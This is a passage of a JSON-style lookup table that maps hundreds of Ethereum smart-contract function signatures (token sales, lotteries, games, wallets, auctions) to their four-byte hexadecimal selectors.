"addPrivateFund(address,uint256)": "0x3bd756b6", "LikeCrowdsale(address,uint256,uint256,uint256)": "0xd031babf", "mintForCreatorsPool(uint256)": "0x06802613", "registerCreatorsPools(address[],uint256,int256)": "0x709be206", "mintForContributorPool(uint256)": "0x69dd312f", "registerContributorPool(address,uint256,int256)": "0x54361699", "registerCrowdsales(address,uint256,uint256)": "0xd15e06a0", "removeTransferAndCallWhitelist(address)": "0x4aec6416", "addTransferAndCallWhitelist(address)": "0xccd15921", "switchDelegate(bool)": "0xec8861e7", "transferMultipleDelegated(address,address[],uint256[],uint256,uint256,uint256,bytes)": "0xe2d45f7b", "transferAndCallDelegated(address,address,uint256,bytes,uint256,uint256,uint256,bytes)": "0xaaf04471", "transferDelegated(address,address,uint256,uint256,uint256,uint256,bytes)": "0x50114925", "freezeSignatureChecker()": "0x686790e5", "setSignatureChecker(address)": "0x11199872", "_transferAndCall(address,address,uint256,bytes)": "0xa9221706", "_transferMultiple(address,address[],uint256[])": "0x66bb28be", "transferAndLock(address,uint256)": "0xbd50b3b4", "_tryUnlockBalance(address)": "0xababb2dd", "LikeCoin(uint256,address,address)": "0x0f482e64", "setOperator(address)": "0xb3ab15fb", "killAllXAITActivity()": "0xc0e9118e", "changeTransfer(bool)": "0x09010e53", "ItemToken()": "0xa30d5627", "OPRAH()": "0x2a92bb17", "MarketPrice()": "0x9dd4fdd3", "getNullAddress()": "0xda98655e", "changeStaker(address)": "0xab55979d", "refill(address,uint256,string)": "0x2359116d", "withdrawOnBehalf(uint256,string,uint256,uint8,bytes32,bytes32)": "0xdb78f5ef", "transferOnBehalf(address,uint256,uint256,uint8,bytes32,bytes32)": "0x3165b26e", "changeName(string,string)": "0x86575e40", "EvaCurrency(string,string)": "0x79b5b1d1", "calcTransfer(uint256)": "0x52cb2a7b", "calcRefill(string,uint256)": "0xedc25f42", "calcWidthraw(string,uint256)": "0x6d05c24d", "getTransferStat()": "0xf8b0c0b6", "getTransferPerc()": "0xcc67b1bf", "getWidthrawPercFor(string)": "0x9dc64f8e", "getWidthrawStatFor(string)": "0x3b626b83", "getRefillPercFor(string)": "0xe534c676", "getRefillStatFor(string)": "0xefc2fd2a", "setTransfer(uint256,uint256)": "0xe16c8053", "setWidthrawFor(string,uint256,uint256)": "0x981489b8", "setRefillFor(string,uint256,uint256)": "0x736b13ae", "canCollect()": "0xc9b0d97b", "teamVestingStage()": "0x7ae2aa34", "claimTeamReserve()": "0x4fb0a3cd", "claimTokenReserve()": "0x9d9afce9", "getLockedBalance()": "0x2549e0b1", "transferOwnershipWithBalance(address)": "0x17faa66f", "ShareXERC20()": "0x2beaf416", "upgradeTo(address)": "0x3659cfe6", "removeOwner(uint256)": "0x6b919488", "WalletLibrary()": "0xec5a25e0", "checkBranchInEpisode(uint256,uint256)": "0xc81050e6", "getEpisodeBranchData(uint256,uint256)": "0x54ef9c3c", "getEpisodeDataCommand(uint256,uint256,uint256)": "0x924dedca", "getEpisodeDataRandom(uint256,uint256,uint256)": "0x4d182bfc", "addBranchInEpisode(uint256,uint256)": "0x9b7750f1", "addEpisodeData(uint256,uint256,uint256,string)": "0xef0582b6", "addEpisode()": "0x8897df9d", "checkRandomFromRandao(uint256)": "0xa5e53bfe", "changeRandao(address)": "0x16b40451", "setAuthor(string,string,address,uint256)": "0x00983401", "EOSINT()": "0xfffcde7c", "sawan()": "0x1a256090", "withdrawForeignTokensMultiple(address,address[],uint256)": "0x5d25d021", "withdrawForeignTokens(address,address,uint256)": "0xa25e6898", "getDonationsCount(address)": "0x4a150e2c", "getDonation(address,uint256)": "0x38e48f70", "donate(address,string,string)": "0x1280db73", "Tspace()": "0x1f8f8100", "ApproveERC20(address[])": "0x8ff5cbc3", "getYumerium(uint256,address)": "0x71cabfb8", "createFixedPeriodVpfFactory(string,bytes32,uint256,int256[],uint256,uint256,uint256)": "0x0937be1a", "createNonRepeatableVpfFactory(string,bytes32,uint256,int256[])": "0xbb397161", "request(bytes32,uint256,uint8)": "0x1b66303d", "ERC20Store(address)": "0x57e0b222", "transferWithSender(address,address,uint256)": "0xdfe0f0ca", "transferFromWithSender(address,address,address,uint256)": "0x5d5e22cd", "replaySweep(address[],address)": "0xeb55b2a3", "enableSweep(uint8[],bytes32[],bytes32[],address)": "0xb7279ca6", "confirmPrint(bytes32)": "0x380ba30c", "requestPrint(address,uint256)": "0xbe23d291", "decreaseApprovalWithSender(address,address,uint256)": "0x61e1077d", "increaseApprovalWithSender(address,address,uint256)": "0x2e0179b5", "approveWithSender(address,address,uint256)": "0x89064fd2", "ERC20Impl(address,address,address,address)": "0x65630493", "ERC20Proxy(string,string,uint8,address)": "0xa5be0c5e", "getImplChangeReq(bytes32)": "0x1cf67724", "confirmImplChange(bytes32)": "0x8181b029", "requestImplChange(address)": "0x48f9e246", "ERC20ImplUpgradeable(address)": "0x36bf2e15", "getCustodianChangeReq(bytes32)": "0x02889f26", "confirmCustodianChange(bytes32)": "0x3a8343ee", "requestCustodianChange(address)": "0x15b21082", "CustodianUpgradeable(address)": "0x2e83faee", "generateLockId()": "0x4d21a24c", "LockRequestable()": "0xfa8fd2b5", "approveContractCall(address)": "0x34d5751a", "coinSendDifferentValue(address[],uint256[])": "0x3006f513", "coinSendSameValue(address[],uint256)": "0x73eef753", "modify_ICOEndDate(uint256)": "0x2f1a8b63", "modify_ICOStartDate(uint256)": "0x1320f838", "modify_Presale3StartDate(uint256)": "0xa5fadf93", "modify_Presale2StartDate(uint256)": "0xecf6512f", "modify_Presale1StartDate(uint256)": "0x53ae8de6", "modify_NovumAddress(address)": "0x55f6a412", "increaseMaxCap(uint256)": "0xadad9c4e", "mintContract(address,address,uint256)": "0xdd53c301", "manualMint(address,uint256)": "0xe4c5ff46", "resumeTransferToken()": "0x3f2e907c", "getWithdraw(address,address,uint32,bytes32[],uint256)": "0x82ade466", "checkStorageProof(bytes32[],address)": "0x6f326ac6", "toAddress(bytes32)": "0x341f6623", "blocksUntilWin()": "0xbee066a8", "getLastBidder()": "0x0fbe333a", "ERC777DemoToken(string,string,uint256,uint256)": "0xd5ceecea", "STRATToken()": "0xfa70f6da", "_mint(address,string)": "0x10e6d746", "smpToken()": "0x73998758", "SweDexDividends()": "0xa859fffe", "saniwallet()": "0x6bf4398d", "_payRefund(bytes32)": "0x55d04877", "_payBidAllocationFee(bytes32)": "0x0c72fe56", "_setOCPTokenContract(address)": "0xccadef15", "allocateBid(address,bytes32)": "0x957d8250", "payDeposit(address,uint256,bytes)": "0xad00297a", "payBid(address,uint256,bytes)": "0xfce897e5", "setClearingPriceSubmissionDeposit(uint256)": "0x0bab4d84", "setClearingPriceComponent(address)": "0xd89ea0f5", "setBiddingComponent(address)": "0xe5533790", "setCurrentAuctionId(uint256)": "0x22aaea91", "clearingPriceComponent()": "0x864059ac", "biddingComponent()": "0x49f22b4a", "currentAuctionId()": "0x0c0b86ca", "setOCPTokenContract(address)": "0x54c916a1", "ocpTokenContract()": "0x1a82eeb4", "_removeAuctionManager(address)": "0x593be1f8", "renounceAuctionManager()": "0x74715432", "addAuctionManager(address)": "0x92609315", "isAuctionManager(address)": "0x6a280317", "auctionState(uint256)": "0x84861e93", "issueLicenseNFT(bytes32)": "0x6749ec48", "payRefund(bytes32,uint256)": "0x62f03290", "calcRefund(bytes32)": "0x612867c2", "doNotAllocateBid(bytes32)": "0x54adb7b1", "allocateBid(bytes32,uint256)": "0x0611ae4a", "setAllocationClosed(uint256)": "0x16962bc1", "setAllocationOpen(uint256)": "0x64c96322", "revealBid(bytes32)": "0xacc9138e", "setRevealClosed(uint256)": "0x2a7e60b6", "setRevealOpen(uint256)": "0x5f7118c7", "submitBid(address,bytes32)": "0x3db3f2cf", "payBid(bytes32,uint256)": "0x1f261939", "setLicenseNFT(address)": "0x5fd030c0", "allocationOpen(uint256)": "0x18f9bdee", "revealOpen(uint256)": "0x08b591a5", "submissionOpen(uint256)": "0xbe275680", "bidDeposit(bytes32)": "0xe02bc1c6", "licenseNFT()": "0xda68d47d", "payReward(uint256,address,uint256)": "0x80a92b67", "calcReward(uint256,address)": "0x85461f69", "CollectChips(address)": "0xee53d619", "AddChip(address,uint32)": "0xdae1bd84", "revokePermissionBatch(address[],string)": "0x0d93afef", "grantPermissionBatch(address[],string)": "0x475c051d", "revokePermission(address,string)": "0x6ff89159", "grantPermission(address,string)": "0xbbd9a5fa", "ToGoConcert()": "0x2de9a13a", "DccbtcToken()": "0xebd863ac", "transferFundsByOwner(address,address)": "0xefb369c7", "createDeposit()": "0xd03ffefb", "getPercent()": "0x2a6dd8c9", "authorizationPayment()": "0xb5d29f21", "receivePayment()": "0x835c19f3", "getDepositMultiplier()": "0x3a2d8784", "asmSymbol(address)": "0x09a2b4ad", "asmName(address)": "0x9f4aaaef", "handleReturnBytes32()": "0xc645ecc4", "handleReturnBool()": "0xcba9a794", "disableChanges()": "0xc5e2f418", "enableBundling()": "0xeec03444", "disableBundling()": "0x30e26cb8", "BithubCommunityToken()": "0xa13c24c7", "CrowdTmoney2()": "0x6e6c4c58", "LAME()": "0x79ba50b1", "Death()": "0x6017bb61", "placeBet(uint256,uint256,uint256,uint256,uint8,bytes32,bytes32)": "0x7cee9ee8", "_transferCroupier(address)": "0x04b6d39e", "_transferSigner(address)": "0x482871ed", "transferCroupier(address)": "0x2792e765", "getVoteCountForOption(uint8)": "0x6403a9ed", "registerBarcode(bytes32,string,string,string,string,string,string)": "0xf95fbf67", "transfer_m(address,uint256,string)": "0xd56a9314", "azatipsToken()": "0x9d0d9f1c", "setRentTime(uint256)": "0x0ccf30f1", "getLand(int256,int256,address)": "0xbc48f4be", "rentedLand()": "0xa03df051", "reclaimLand(int256,int256)": "0x9cef8873", "reclaimableLand()": "0x1d6477e1", "getLand(int256,int256)": "0xca5c7a34", "availableLand()": "0xcb9a5edd", "Garcut()": "0x0f12b32a", "RexToken()": "0x6fc1cbbd", "SistanToken()": "0x06309aa0", "KD1Token()": "0xc513cde2", "getcoeffcient(address,uint256)": "0xd8c2c1c1", "LoveBite()": "0xfcccc68f", "ACLYDTOKEN()": "0x2a4f1f21", "IDEA()": "0x2a7ef0cc", "BreakbitsERC20Token()": "0xb2f2303a", "THANKSTEST1()": "0x8288196d", "ImageToken()": "0x4c13fbb2", "tenmatest()": "0x9ac50a62", "globecoin()": "0x971ec3ce", "EtherDaruma(address,address,address,uint256,uint256,uint256)": "0xc82b8ec5", "contain(uint256[],uint256)": "0x0a4a57bc", "contain(address[],address)": "0xbee23c42", "getLottoData(uint8)": "0x266361f5", "updateLottoParams(uint256,uint256,uint256)": "0x2e519dd5", "getOdds()": "0x4c5be574", "updateOdds(string,uint256)": "0xbd3a2ef4", "updateRndSeed()": "0x28fd72e2", "freeLottery(uint256)": "0xeb2a7c4a", "myName()": "0xfae2dd4b", "playNumberSuit(uint256[])": "0x7f9343ad", "playNumber(uint256[])": "0x17324249", "play(uint256,uint256[])": "0x4281b34b", "playBigger(uint256[])": "0x1bd2c21c", "setParameters(address,uint256)": "0xc4198161", "purchaseGas(address,address,uint256,uint256,uint256,uint8,bytes32,bytes32)": "0xbb056781", "PredatexDua()": "0x63fa9888", "_generatePersonalNumber(string,uint256)": "0x6029755e", "insertInfo(string,uint256,uint256)": "0x3c86063c", "leerGat()": "0xdd4e6993", "withdrawTokenId(uint256)": "0xbb6ad6ef", "isRefundApplied(uint256)": "0x612ef6e9", "applyRefund(uint256,bool)": "0xb08e0d3e", "buyInBatch(uint256,uint256,uint256[],uint256)": "0xdfd17f2b", "_refund(uint256,uint256,uint256,uint256)": "0xfce20190", "_buyInBatch(uint256,address,uint256,uint256[],uint256)": "0xb4a7a022", "_buy(uint256,uint256,uint256,address,uint256)": "0xc48d5a4a", "transferFromInBatch(address,address,uint256[])": "0x11a76729", "reverseBytes(bytes)": "0x2f278ecb", "hexAddress(bytes32)": "0xd9844e25", "roomNight(uint256)": "0x628c225c", "roomNightsOfOwner(uint256,uint256,bool)": "0x899f107d", "_removeRoomNight(address,uint256)": "0xa7f86c63", "_pushRoomNight(address,uint256,bool)": "0xe5dada63", "releaseCarbonDollar(uint256)": "0xf7fd3d01", "MAPT()": "0x4d474d63", "SingularityTes25()": "0xa45066e5", "ViewBet(address,uint256)": "0x9f06a579", "KAL2Token()": "0x08908579", "gujarat()": "0x6fcc52e7", "synechronToken()": "0x7a4b762b", "Blincoin()": "0xed6a2d35", "KamuToken()": "0x511e5639", "buyKey(uint256,uint256)": "0x923d566d", "exchangeOwner(uint256,uint256)": "0x9822e501", "createDog(uint256,uint256)": "0xbb7c15ab", "claimUnsold(address)": "0x75048ebd", "calcChanges(uint256,uint256,uint256)": "0x3f85be9c", "calcOrderToMsAmount(uint256)": "0xe3038aaf", "initFactorReward(uint256,uint256,uint256,uint256)": "0xd0e2bef0", "calcTimedQuotaByPower(uint256,uint256,uint256,uint256)": "0xe5ec8df3", "getLineUpEnable_miner(address)": "0x78c68573", "getLineUpEnable_pool(address)": "0xe278d283", "getLineUpEnable_default()": "0xc8216f33", "getTransformTarget_miner(address)": "0x390d70f5", "getTransformTarget_pool(address)": "0x998cab7e", "getTransformTarget_default()": "0xc578b2f4", "getWorkpointSupportCancel()": "0xef84e27f", "getInvitationMultiple()": "0x37dfc70c", "getOrderDealTimeInterval()": "0x8c4d3193", "getInvitationValidPeriod()": "0x159da82d", "getOrderListLengthFactor()": "0xda7911e1", "getOrderDealSpeed()": "0x07d76ae9", "getOrderSupportCancel()": "0x87986f52", "getDenominator()": "0x190eaaba", "power2(uint256,uint256,uint32,uint32)": "0x4f5b9f23", "calculateRedeemReturn(uint256,uint256,uint32,uint256)": "0x335fba7e", "calcMiningSharesAmount(uint256,uint256)": "0xd28ae9ef", "calcInvitationAmount(uint256)": "0x0cf94cda", "calcFactorReward(uint256)": "0xb8e6a433", "calcEma(uint256,uint256,uint32,uint256)": "0x40809f9d", "calcTimedQuota(uint256,uint256,uint256,uint256)": "0x2bd543c7", "costOfTxShares()": "0x90bdb275", "setBAAAU(bytes32,address,address,address,uint256)": "0xf3bf78e7", "setBAAU(bytes32,address,address,uint256)": "0xd5b85b2d", "setBUB(bytes32,uint256,bytes)": "0x0fde5686", "setBUS(bytes32,uint256,string)": "0x7e2e3958", "setBUI(bytes32,uint256,int256)": "0xe62a4ac9", "setBUUU(bytes32,uint256,uint256,uint256)": "0x0d68ddeb", "setBUU(bytes32,uint256,uint256)": "0x8d0dd3c0", "setBAB(bytes32,address,bytes)": "0xfa6878a7", "setBAI(bytes32,address,int256)": "0x23ef2e56", "setBAS(bytes32,address,string)": "0x0b96e72e", "setBUA(bytes32,uint256,address)": "0x507e97a9", "setBAU(bytes32,address,uint256)": "0x178cec5c", "setBB(bytes32,bytes)": "0x6a643ce6", "setBS(bytes32,string)": "0x3bc058c7", "setBI(bytes32,int256)": "0xc26c84ec", "setBA(bytes32,address)": "0x9c9fe83a", "setBU(bytes32,uint256)": "0x2984f486", "getBAAAU(bytes32,address,address,address)": "0xdef2be48", "getBAAU(bytes32,address,address)": "0x064da5e7", "getBUB(bytes32,uint256)": "0x0ee454dc", "getBUS(bytes32,uint256)": "0x7cec3a3a", "getBUI(bytes32,uint256)": "0xdac645bd", "getBUUU(bytes32,uint256,uint256)": "0xf72e460a", "getBUU(bytes32,uint256)": "0xeb2bdbab", "getBAB(bytes32,address)": "0xbee4cc6b", "getBAI(bytes32,address)": "0x18e0d683", "getBAS(bytes32,address)": "0x1c3ad417", "getBUA(bytes32,uint256)": "0x81bc50ef", "getBAU(bytes32,address)": "0x97a95086", "getBB(bytes32)": "0x813d13cb", "getBS(bytes32)": "0xae190819", "getBI(bytes32)": "0xb910378d", "getBA(bytes32)": "0xb76e5e06", "getBU(bytes32)": "0xdb3268d8", "setBAU2(bytes32,address,uint256,uint256)": "0xf83761e5", "cutBAU2Length(bytes32,address,uint256)": "0x660686de", "pushBAU2(bytes32,address,uint256)": "0xb42e8923", "getBAU2Length(bytes32,address)": "0x5a4d8e59", "getBAU2(bytes32,address,uint256)": "0xefc7652e", "withdrawMineralTo(address,uint256)": "0x338f4ad6", "withdrawMineral(uint256)": "0x8a6b6877", "withdrawOrderTo(address,uint256)": "0xb2813f19", "withdrawOrder(uint256)": "0xfb791b0b", "withdrawSharesTo(address,uint256)": "0x8e242d54", "withdrawShares(uint256)": "0x19810f3c", "mineral2Shares(uint256)": "0xebed7a95", "order2Shares(uint256)": "0xa4d8b40a", "depositMineral()": "0x9dbf7014", "depositOrder()": "0xb1bcc1b7", "depositShares()": "0xea071ac0", "setColdWallet(address,uint256,uint256)": "0x0af6c9ff", "restoreFromColdWallet()": "0xb2cc36fc", "saveToColdWallet(uint256)": "0x597c69cc", "balanceOfColdWallet()": "0xa3833a13", "balanceOfMineral()": "0xf9e24dc2", "balanceOfOrder()": "0xbf33be97", "balanceOfShares()": "0x2b596a23", "balanceOfRaw()": "0x88a4e86c", "ethereumToTokens2_(uint256)": "0x349aa97e", "getReferralBonus(uint256)": "0xad33e21d", "setMaxReferrerBonusRequirement(uint256)": "0x376fc952", "setMaxReferrerBonus(uint256)": "0x56d13e6e", "setMinReferrerBonus(uint256)": "0x8fb21a4b", "withdrawCommunity(uint256)": "0xfa7c31af", "makeProfit(uint256)": "0x8ef1a6b6", "makeProfit()": "0x17203e1d", "stubFunction(address,uint256)": "0x6105c8af", "distributeCastleLoot()": "0x9c73048b", "isSmartSharingEnded(bytes32)": "0xc65025f8", "crowdsaleTransfer(address,address,uint256)": "0x80a979e1", "LIRAX(uint256)": "0xba8bb22a", "nome_vincitore()": "0x3dc0d600", "chiudi_votazioni()": "0xfd7ab1ad", "avvia_votazioni()": "0x4199dbe6", "distributedToken()": "0x8f49da4b", "startPreIcoDate()": "0x3df40c7a", "exchangeRateTimestamp()": "0x77dfec3c", "bonusClaimedTokens()": "0x68ee137e", "report()": "0x2606a10b", "maxEthCapBuyInFp()": "0x463cf730", "totalWeiCollected()": "0xe7d0242b", "grantsCreated()": "0xcaee7c78", "ROLE_UNDER_MINTER()": "0x985989d2", "matured()": "0x454c87b3", "distributor()": "0xbfe10928", "eth_received()": "0x8666107c", "rand2()": "0xee2316db", "TEAM_LOCK_DURATION_PART1()": "0x6d2980f6", "totaletherstransacted()": "0xfd04a902", "bonusPreIco()": "0x7028439e", "FXRATE()": "0x448c0341", "isMinting()": "0x2a8092df", "TOKENS_ADVISORS()": "0x9978be95", "freezeAddress()": "0xe45da0be", "privateSalePrice()": "0xf560d415", "STATUS_DEAL_RELEASE()": "0x5937de14", "VUP_TOKEN_SUPPLY_TIER4()": "0xa829d8ec", "isEndOffer()": "0x1045de72", "cnyBtcRate()": "0x96de9c8c", "benefitFunds()": "0x6f53da8f", "etoken2Symbol()": "0xa66e6e5c", "softCapPreSale()": "0xeb2ff2d2", "payDividendsManually()": "0x787ed54f", "equipContract()": "0xc11b2252", "totalGenesisTokens()": "0x78d8e17b", "rateRoundSeed()": "0x4cf812ea", "etherToDustPrice()": "0x02bb2929", "InitalPos()": "0x29aacd10", "limitGasPrice()": "0x07259d06", "Token_3()": "0x3ce948c8", "DICE_RANGE()": "0x596a2735", "lastBlock_v17Hash_uint256()": "0x5b48165f", "redemptionWallet()": "0x7619317b", "info_Name()": "0xffeeac82", "fiatDeposits()": "0x09efcb8d", "toBuyBack()": "0xb5919b48", "reservedLPT()": "0xf75a275b", "__address0__()": "0x5a30b194", "last_roll()": "0x56ccdadb", "totalUsdAmount()": "0x0c4dd1d9", "lowestAskPrice()": "0x7cc4e55f", "limitDateCrowdWave3()": "0x4c594c1e", "EXA()": "0x6c749c26", "moneyManager()": "0xa4c8b35d", "PERSONAL_FIRST_HOUR_CAP()": "0xf18dd512", "LOCK_STAKE()": "0x2f113f27", "transactionFeeRateM()": "0xcea63361", "isDirectDebitEnable()": "0xa196bea0", "tInstance()": "0x4f817a2a", "foundersTokensWalletSlave()": "0x56b6cb70", "buy_block()": "0xb626913f", "shareholder1()": "0x5e1dca04", "minimumNumber()": "0xc91cd9d0", "DGDTalk()": "0x608f1f7e", "TOKEN_PRICE_N()": "0x45cfad3e", "pauseDET()": "0xcf1c9f52", "multiOwnableCreator()": "0x6b263efa", "creatorsLocked()": "0xad6a0546", "minimumTickets()": "0x4e4afa1b", "phase1WeiRaised()": "0x48640aba", "OPENING_TIME()": "0x5200d643", "factor()": "0x54f703f8", "lowTimeBonusLimit()": "0xb9531df3", "devTokensHolder()": "0x59be9cc0", "variationCycle()": "0xb73a9dbc", "stopFlagOn()": "0x76f95818", "allowAirdrop()": "0x09b22a4d", "contractReservedBalance()": "0x37cc7761", "datasetHub()": "0xbc04d77b", "BONUS_PERCENTAGE()": "0x35ed3fd6", "presaleTotalWei()": "0x633b5b1f", "totalRaiseWei()": "0x1c085a21", "teamUnlock2()": "0xe5b6eac4", "totalEtherCap()": "0x34971dd6", "tokenForBounty()": "0xea98fcf9", "ICO_START2()": "0x3f1f59a4", "MethNSupply()": "0x413a7f9a", "presaleAllocation()": "0x81d136cb", "isEarlyBirdsStage()": "0xdbbd4865", "totalfv()": "0xc3af702e", "allocatedTotal()": "0x31649233", "icoSaleSoftCap()": "0xae6439c4", "_cap()": "0x060cf4e8", "last50plusblokhack()": "0xd7b0ca65", "foundersFundTimelock2Address()": "0xd13bf769", "_fConfig()": "0xe0ce72cb", "migrationDestination()": "0x79a87b19", "SOFT_CAP_T()": "0xe268ea6b", "waitTimeBlocks()": "0x695741f8", "PreICODayOneCents()": "0x1377900b", "contractWallet()": "0xc8e706e2", "ROLE_STATE_LOCK_PROVIDER()": "0x17c163e9", "maxInvEth()": "0x7d4ce874", "ethealToken()": "0x03d756cb", "earlyInvestorsBonus()": "0x755c30a4", "teamAllocatedTime()": "0xf461db0e", "nAlarms()": "0xf8721f1e", "isLock()": "0x09d8da2e", "lastBlock_v2()": "0xf00c7669", "presaleStartTime()": "0xa82524b2", "ADVISORS_SHARE()": "0x8562e452", "tokensSoldLimit()": "0xae6a19af", "UsersNumber()": "0x659b9c72", "SPECIALIST_ONE()": "0xafb3ae7a", "rateSecondRound()": "0x04ecdaac", "IRC_PER_ETH_SALE()": "0xef85fdad", "round1Target()": "0x80008794", "MAIN_SALE_BONUS_PERCENTAGE_PHASE3()": "0x767f0215", "founderAmount()": "0x18656a1e", "POWR()": "0x20e89790", "project_wallet()": "0x8d809b0e", "CNT_address()": "0x183d4cf7", "TOTAL_XB_TOKEN_FOR_PRE_SALE()": "0x04a4a0ec", "allTokenAddress()": "0xf9907274", "ecosystemWallet()": "0x435263ef", "feesRateCongres()": "0x89b1802c", "presalestartTime()": "0x9c24654c", "KIN_PER_WEI()": "0x4bc4d2ba", "phaseReleaseAmount()": "0xdfee2bad", "STAGE_2_START()": "0x9e916157", "bonus02Start()": "0xa14a5648", "initSilver()": "0xff78461c", "StartCrowdsale()": "0xc7a32726", "firstBlock()": "0x231b0268", "openGroupNumber()": "0x6d991cce", "round6StartTime()": "0x44772899", "firstDiscountPrice()": "0x2ffc7b7e", "reservedTokensTeam()": "0xfefaa293", "userInitialized()": "0xaf79ffde", "extractOversightAddressesIndexLength()": "0xe455fce7", "soldTokensLimit()": "0x117b198e", "payaFinished()": "0x229eb105", "endBlockBonus3()": "0xd245aa92", "eachUnlockCounts()": "0x63482cf0", "icoBalance()": "0x3ac31e02", "lastBidID()": "0x57f196fa", "LOCKED_1Y_DATE()": "0xf4509fc2", "bbAdvisorWallet()": "0x7bc21b6b", "init_level()": "0x66b7afbf", "maximumWEI()": "0x27fe0d10", "totalTokensICO4()": "0xe5c361b0", "totalBorrowingItem()": "0x4fdf64ce", "activated()": "0x186601ca", "AMOUNT_PER_PHASE()": "0x73ec6bb5", "MULT_FACTOR()": "0x3608c9eb", "Menu03()": "0x808f8292", "callerAllocationPeriod()": "0xe4cfe9eb", "gameBeginTime()": "0x3c8ca83d", "totalCreationCap()": "0x8f717e80", "MAXIMUM_PARTICIPATION_AMOUNT()": "0x6586bb25", "individualCapInWei()": "0xe6f0b6cf", "bountyDurationInBlocks()": "0xf38323bb", "playCount1()": "0x117d82d6", "STARTING_SNAIL_COST()": "0x86544e11", "TOKEN_PREICO_CAP()": "0xa2ce4215", "crowdsaleHardEndTime()": "0x9784f585", "cnt_registrations()": "0xf385d890", "transferActive()": "0x2331af61", "mainFundPrecent()": "0xececa529", "lottoHighestNumber()": "0x8f356f97", "mintingIsAllowed()": "0x1822cbc5", "advisorReserve()": "0xf3746ff7", "groupPolicyInstance()": "0xf8516c6c", "withdrawLeft()": "0x4b52f48f", "PHASE1_ACCOUNT_TOKENS_MAX()": "0xa6e53b99", "c_endTime()": "0xbbca0a89", "ROUND_6_PRESALE_BONUS()": "0x4205875f", "walletFounder1()": "0x5f2961e1", "ICOweek2End()": "0xebcc9a31", "getCrydrStorageAddress()": "0x9554c8e5", "seriesASupply()": "0x97a75fe8", "ESCBDevMultisig()": "0xaa1d807f", "startFinalStage1()": "0xded1c11b", "preAlphaPrice()": "0xc44299c7", "CAT()": "0x8a8b7deb", "gas4Token()": "0xdc30685e", "marketToken()": "0xad48d611", "sale2Stopped()": "0xf73089b9", "endICO14()": "0xfe5e7e3e", "goolaTeamAddress()": "0x44af18c2", "hodl_interval()": "0xbaf05a87", "TDESupply()": "0xf770c96f", "requiredTimeBetweenDraws()": "0xd6fa3efa", "swapAddr()": "0xc2f137f1", "tokenGenerationCap()": "0xcac12d2d", "startFundingTime()": "0xb75ece9c", "geneManager()": "0x80173a19", "additionalBonusPercent()": "0x261aa1c5", "gasReq()": "0x21a33e00", "nextDerivativeToken()": "0x241d1108", "baseVerifierFee()": "0x01b2a413", "isAdvisorsTokensFirstReleased()": "0x12eba773", "trusted()": "0x7e2a6db8", "SOFTCAP_ETH_LIMIT()": "0xcee02a86", "setBankrollerContractOnce(address)": "0xcc783c5e", "EOSBetSlots()": "0x410ace1f", "stopMigration()": "0xe19a7bc8", "showMigrationStabitcoinAddress(address)": "0x73a91544", "setMigrationStabitcoinAddress(string)": "0x700df1f6", "showMigrationAmount(address)": "0x19afdfe1", "migrationChain(uint256)": "0x8705ae63", "StabitCoin(uint256)": "0x8f72e065", "ANXToken()": "0x3411231c", "AngelsvsRedSox419()": "0x03eeb40e", "setdot(address)": "0x6d161bc1", "usdToEth(uint256)": "0xbcecf667", "depositofferToken()": "0x84b3b232", "changedeposito(address)": "0x63981b33", "addKycAddress(address,bool)": "0x4449307b", "finaliseICO()": "0x39f95e63", "ethToUsd(uint256)": "0x946d1480", "usdRaised()": "0xeadd94ec", "fundFailed()": "0x6e62de19", "fundSucceeded()": "0x67de81e8", "transferFromBatch(address[],uint256[])": "0x5941bb80", "ERC20Batch(address,address)": "0x0883cb04", "getCard()": "0x5112f02c", "QuickFlip()": "0x1e031a00", "unset()": "0xbbcbefd0", "ownerOf(string)": "0x920ffa26", "nickOf(address)": "0xa59aef4e", "setGemPrice(uint256)": "0x27bfeaf5", "setGemPerMiner(uint256)": "0xcb91a6ba", "setMinerPrice(uint256)": "0x6cf7da53", "getMinerLevel(uint256)": "0x2e2bec5c", "minerState(uint256)": "0x1754bd8e", "getMinersOnSale()": "0x3d1d2202", "getMinersByAddress(address,address)": "0x7df65a1d", "nameMiner(uint256,string)": "0x8bc88d7c", "transferMiner(address,uint256)": "0xe8e44248", "buyMinerFromSale(uint256)": "0x1f1b11cc", "setOnSale(uint256,bool,uint256)": "0xeac50c47", "goToSleep(uint256)": "0xeede471e", "goToWork(uint256)": "0xdd01f781", "createMiner()": "0x9493b9b0", "buyMinersWithGem(uint64)": "0xea1eaecb", "buyMinersWithEther(uint64)": "0xd6b1e4a9", "buyGems()": "0x7daa9fcd", "CryptoGems()": "0xbe5babc2", "destroyFactory()": "0xf8515cfc", "toggleFactoryPower()": "0x645f0d11", "deleteEtherBox(address)": "0x82c0287e", "publishEtherBox(bytes32,string,uint256)": "0x8f5e619b", "esteem(bytes32,string,address)": "0x31363c86", "isExpired(address)": "0xba2eb541", "getEtherBoxes(address)": "0x71a8ba25", "SampleCrowdsale(uint256,uint256,uint256,uint256,address)": "0x3f202951", "STERNIUMHUGEELLIGENCECOIN()": "0x13e7d076", "addBalances(address[],uint256[])": "0xddf0c070", "withdrawForTo(address,address,uint256)": "0x2d68bad7", "withdrawFor(address,uint256)": "0xdb518db2", "depositTo(address)": "0xb760faf9", "doDeposit(address)": "0x85cc3114", "doWithdraw(address,address,uint256)": "0x9f70c3dc", "HODLWallet(address[],uint256[])": "0x8ef2826e", "Altn()": "0x634b8dc3", "setupFundingTime(uint256,uint256)": "0x3ad04d8f", "setupFundingRate(uint256)": "0x665939cc", "withdrawForFiveStep()": "0x9bf6b0a8", "withdrawForFourStep()": "0x63391689", "withdrawForThreeStep()": "0xfcaa96fa", "withdrawForTwoStep()": "0xc303c53a", "withdrawForOneStep()": "0x65b892a1", "funding(address,uint256,uint256)": "0x18e6ab9c", "processFunding(address,uint256,uint256)": "0xfe47c806", "BTMC()": "0xc33e1844", "MediaCash()": "0x44845c28", "setMaxContribution(uint256)": "0x03ed9d21", "setReserveWallet(address)": "0xdda4fa8f", "initRates(uint256[],uint256[])": "0x3e1457a1", "quickSort(address[21],int256,int256)": "0x1877fc8a", "inRankList(address)": "0x0f13dbde", "updateRankList(address)": "0xb5e12715", "getCurrentLevel(uint256,uint256,uint256)": "0xcc58bcf8", "updateCrytal(address)": "0x7ff02139", "updateHashrate(address)": "0xfcf4333a", "getHighestUnitPriceIdxFromSell()": "0x68381b96", "getSellDemand(uint256)": "0x78473485", "withdrawSellDemand(uint256)": "0x7a6e9e41", "buyCrystal(uint256,uint256)": "0xf9d70200", "sellCrystalDemand(uint256,uint256,string,string)": "0x0dda20d1", "getLowestUnitPriceIdxFromBuy()": "0xd60207c7", 